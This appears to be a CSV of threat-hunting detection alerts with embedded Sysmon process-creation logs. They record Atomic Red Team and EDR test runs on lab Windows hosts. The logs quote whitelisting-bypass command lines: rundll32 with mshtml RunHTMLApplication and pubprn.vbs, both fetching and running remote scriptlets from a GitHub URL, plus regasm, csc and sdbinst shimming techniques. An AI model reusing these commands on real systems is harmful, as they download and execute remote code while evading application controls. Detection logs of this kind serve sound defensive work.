747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-6652-5D3F-0000-0010B9708C00 + 5844 + C:\Windows\System32\cmd.exe + cmd /c rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test") + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1564436051.041111,2019-07-30T01:34:11.041111+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test") )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4971 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:34:10.619 + 747F3D96-6652-5D3F-0000-001058828C00 + 348 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test") + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-6652-5D3F-0000-0010B9708C00 + 5844 + C:\Windows\System32\cmd.exe + cmd /c rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test") + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1085] Rundll32 Execution detected,1564436051.041111,2019-07-30T01:34:11.041111+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test") )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4971 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:34:10.619 + 747F3D96-6652-5D3F-0000-001058828C00 + 348 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test") + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-6652-5D3F-0000-0010B9708C00 + 5844 + C:\Windows\System32\cmd.exe + cmd /c rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test") + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1564436050.388196,2019-07-30T01:34:10.388196+04:00,,Threat,Low,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test") )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4969 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:34:10.292 + 747F3D96-6652-5D3F-0000-0010B9708C00 + 5844 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd /c rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test") + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-6609-5D3F-0000-00109FBF8500 + 1208 + C:\Windows\System32\cmd.exe + "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1117] Bypassing Application Whitelisting,1564436050.373481,2019-07-30T01:34:10.373481+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\SysWOW64\rundll32.exe) with commandline ( rundll32 AllTheThings.dll,EntryPoint)",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4968 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:34:05.526 + 747F3D96-664D-5D3F-0000-0010BB5D8C00 + 5572 + C:\Windows\SysWOW64\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + rundll32 AllTheThings.dll,EntryPoint + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B + 747F3D96-664D-5D3F-0000-00108D5B8C00 + 912 + C:\Windows\System32\rundll32.exe + rundll32 AllTheThings.dll,EntryPoint + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1564436050.373481,2019-07-30T01:34:10.373481+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\rundll32.exe ) through command line ( rundll32 AllTheThings.dll,EntryPoint )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4968 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:34:05.526 + 747F3D96-664D-5D3F-0000-0010BB5D8C00 + 5572 + C:\Windows\SysWOW64\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + rundll32 AllTheThings.dll,EntryPoint + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B + 747F3D96-664D-5D3F-0000-00108D5B8C00 + 912 + C:\Windows\System32\rundll32.exe + rundll32 AllTheThings.dll,EntryPoint + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1085] Rundll32 Execution detected,1564436050.373481,2019-07-30T01:34:10.373481+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\rundll32.exe ) through command line ( rundll32 AllTheThings.dll,EntryPoint )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4968 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:34:05.526 + 747F3D96-664D-5D3F-0000-0010BB5D8C00 + 5572 + C:\Windows\SysWOW64\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + rundll32 AllTheThings.dll,EntryPoint + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B + 747F3D96-664D-5D3F-0000-00108D5B8C00 + 912 + C:\Windows\System32\rundll32.exe + rundll32 AllTheThings.dll,EntryPoint + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1117] Bypassing Application Whitelisting,1564436045.542307,2019-07-30T01:34:05.542307+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32 AllTheThings.dll,EntryPoint)",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4967 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:34:05.475 + 747F3D96-664D-5D3F-0000-00108D5B8C00 + 912 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + rundll32 AllTheThings.dll,EntryPoint + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-664D-5D3F-0000-0010F1498C00 + 6836 + C:\Windows\System32\cmd.exe + cmd /c rundll32 AllTheThings.dll,EntryPoint + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1138] Application Shimming - process,1553028767.134377,2019-03-20T00:52:47.134377+04:00,,Threat,High,"[T1138] Application Shimming - process , please check raw log",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 1966449 + + + + + Microsoft-Windows-Sysmon/Operational + PC01.example.corp + + + + + + 2019-03-19 20:52:47.054 + 365ABB72-569F-5C91-0000-001012610800 + 2548 + C:\Windows\System32\sdbinst.exe + 6.0.7600.16385 (win7_rtm.090713-1255) + Application Compatibility Database Installer + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\sdbinst.exe" -q "C:\Windows\AppPatch\Test.SDB " + C:\Windows\System32\ + EXAMPLE\user01 + 365ABB72-5417-5C91-0000-002035340300 + 0x33435 + 1 + High + MD5=2996B3E7BBA42BEA62D386D9386EDE97,IMPHASH=87CBEAE39ADA9E96C7F27B94962CD83F + 365ABB72-551C-5C91-0000-001030590500 + 2704 + C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe + "C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe" + +",PC01.example.corp,Microsoft-Windows-Sysmon/Operational +"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1564436045.542307,2019-07-30T01:34:05.542307+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 AllTheThings.dll,EntryPoint )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4967 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:34:05.475 + 747F3D96-664D-5D3F-0000-00108D5B8C00 + 912 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + rundll32 AllTheThings.dll,EntryPoint + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-664D-5D3F-0000-0010F1498C00 + 6836 + C:\Windows\System32\cmd.exe + cmd /c rundll32 AllTheThings.dll,EntryPoint + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1085] Rundll32 Execution detected,1564436045.542307,2019-07-30T01:34:05.542307+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 AllTheThings.dll,EntryPoint )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4967 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:34:05.475 + 747F3D96-664D-5D3F-0000-00108D5B8C00 + 912 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + rundll32 AllTheThings.dll,EntryPoint + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-664D-5D3F-0000-0010F1498C00 + 6836 + C:\Windows\System32\cmd.exe + cmd /c rundll32 AllTheThings.dll,EntryPoint + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1138] Application Shimming - process,1553028746.364512,2019-03-20T00:52:26.364512+04:00,,Threat,High,"[T1138] Application Shimming - process , please check raw log",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 1966444 + + + + + Microsoft-Windows-Sysmon/Operational + PC01.example.corp + + + + + + 2019-03-19 20:52:26.194 + 365ABB72-568A-5C91-0000-0010D24B0800 + 4072 + C:\Windows\System32\sdbinst.exe + 6.0.7600.16385 (win7_rtm.090713-1255) + Application Compatibility Database Installer + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\sdbinst.exe" -q -u "C:\Windows\AppPatch\Test.SDB " + C:\Windows\System32\ + EXAMPLE\user01 + 365ABB72-5417-5C91-0000-002035340300 + 0x33435 + 1 + High + MD5=2996B3E7BBA42BEA62D386D9386EDE97,IMPHASH=87CBEAE39ADA9E96C7F27B94962CD83F + 365ABB72-551C-5C91-0000-001030590500 + 2704 + C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe + "C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe" + +",PC01.example.corp,Microsoft-Windows-Sysmon/Operational +[ T1059 ] wscript or cscript runing script,1564436085.660037,2019-07-30T01:34:45.660037+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) Trying to run wscript or cscript with Command Line (cscript /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs 127.0.0.1 script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test.sct) and Parent Image :C:\Windows\System32\cmd.exe , Parent CommandLine (cmd /c cscript /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs 127.0.0.1 script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test.sct) in directory : ( C:\Windows\system32\ )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5006 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:34:45.524 + 747F3D96-6675-5D3F-0000-0010875C8F00 + 4036 + C:\Windows\System32\cscript.exe + 5.812.10240.16384 + Microsoft ® Console Based Script Host + Microsoft ® Windows Script Host + Microsoft Corporation + cscript /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs 127.0.0.1 script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test.sct + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=0E3C0779D8EAAD3B00363D7890DDC8272B510D49,MD5=A45586B3A5A291516CD10EF4FD3EE768,SHA256=59D3CDC7D51FA34C6B27B8B04EA17992955466EB25022B7BD64880AB35DF0BBC,IMPHASH=2B44D2206B9865383429E9C1524F1CAC + 747F3D96-6675-5D3F-0000-0010AA498F00 + 4184 + C:\Windows\System32\cmd.exe + cmd /c cscript /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs 127.0.0.1 script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test.sct + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547556.069498,2019-07-19T18:45:56.069498+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "del T1121.dll" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3615 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:45:56.002 + 747F3D96-D7A4-5D31-0000-0010C9C22900 + 6804 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "del T1121.dll" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547555.699293,2019-07-19T18:45:55.699293+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U T1121.dll" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3613 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:45:55.672 + 747F3D96-D7A3-5D31-0000-001081B22900 + 5800 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U T1121.dll" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1138] Application Shimming - process,1553028745.943907,2019-03-20T00:52:25.943907+04:00,,Threat,High,"[T1138] Application Shimming - process , please check raw log",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 1966429 + + + + + Microsoft-Windows-Sysmon/Operational + PC01.example.corp + + + + + + 2019-03-19 20:52:25.853 + 365ABB72-5689-5C91-0000-0010543F0800 + 3896 + C:\Windows\System32\sdbinst.exe + 6.0.7600.16385 (win7_rtm.090713-1255) + Application Compatibility Database Installer + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\sdbinst.exe" -q "C:\Windows\AppPatch\Test.SDB " + C:\Windows\System32\ + EXAMPLE\user01 + 365ABB72-5417-5C91-0000-002035340300 + 0x33435 + 1 + High + MD5=2996B3E7BBA42BEA62D386D9386EDE97,IMPHASH=87CBEAE39ADA9E96C7F27B94962CD83F + 365ABB72-551C-5C91-0000-001030590500 + 2704 + C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe + "C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe" + +",PC01.example.corp,Microsoft-Windows-Sysmon/Operational +[ T0000 ] Suspicious process name detected,1563547555.621447,2019-07-19T18:45:55.621447+04:00,,Threat,High,User Name : ( MSEDGEWIN10\IEUser ) with Command Line : ( C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library C:\AtomicRedTeam\atomics\T1121\src\T1121.cs ) contain suspicious command ( \csc.exe),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3611 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:45:55.057 + 747F3D96-D7A3-5D31-0000-0010F2A42900 + 4784 + C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe + 4.7.3190.0 built by: NET472REL1LAST_C + Visual C# Command Line Compiler + Microsoft® .NET Framework + Microsoft Corporation + C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library C:\AtomicRedTeam\atomics\T1121\src\T1121.cs + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=ABAF24113034BBA4B4F4AC19D9097D36943D2E35,MD5=B87EE552626023951A7F03F2D31DA8A7,SHA256=D511363874B2A00D3DA5A20E6AE826334795A3A52AB5F8555C309D8068F5915B,IMPHASH=C4963CB3AF58DCFC863E42DD3B6FB80D + 747F3D96-D7A3-5D31-0000-0010A0A22900 + 6748 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" /c "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library C:\AtomicRedTeam\atomics\T1121\src\T1121.cs" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[ T0000 ] Suspicious process name detected,1563547555.105804,2019-07-19T18:45:55.105804+04:00,,Threat,High,User Name : ( MSEDGEWIN10\IEUser ) with Command Line : ( "C:\Windows\system32\cmd.exe" /c "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library C:\AtomicRedTeam\atomics\T1121\src\T1121.cs" ) contain suspicious command ( \csc.exe),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3610 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:45:55.023 + 747F3D96-D7A3-5D31-0000-0010A0A22900 + 6748 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library C:\AtomicRedTeam\atomics\T1121\src\T1121.cs" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547555.105804,2019-07-19T18:45:55.105804+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library C:\AtomicRedTeam\atomics\T1121\src\T1121.cs" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3610 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:45:55.023 + 747F3D96-D7A3-5D31-0000-0010A0A22900 + 6748 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library C:\AtomicRedTeam\atomics\T1121\src\T1121.cs" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1138] Application Shimming - process,1553028585.172729,2019-03-20T00:49:45.172729+04:00,,Threat,High,"[T1138] Application Shimming - process , please check raw log",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 1966423 + + + + + Microsoft-Windows-Sysmon/Operational + PC01.example.corp + + + + + + 2019-03-19 20:49:45.052 + 365ABB72-55E9-5C91-0000-00102EEB0700 + 2104 + C:\Windows\System32\sdbinst.exe + 6.0.7600.16385 (win7_rtm.090713-1255) + Application Compatibility Database Installer + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\sdbinst.exe" -q -u "C:\Windows\AppPatch\Test.SDB " + C:\Windows\System32\ + EXAMPLE\user01 + 365ABB72-5417-5C91-0000-002035340300 + 0x33435 + 1 + High + MD5=2996B3E7BBA42BEA62D386D9386EDE97,IMPHASH=87CBEAE39ADA9E96C7F27B94962CD83F + 365ABB72-551C-5C91-0000-001030590500 + 2704 + C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe + "C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe" + +",PC01.example.corp,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547519.48325,2019-07-19T18:45:19.483250+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3606 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:45:06.251 + 747F3D96-D772-5D31-0000-00107CF02800 + 324 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + 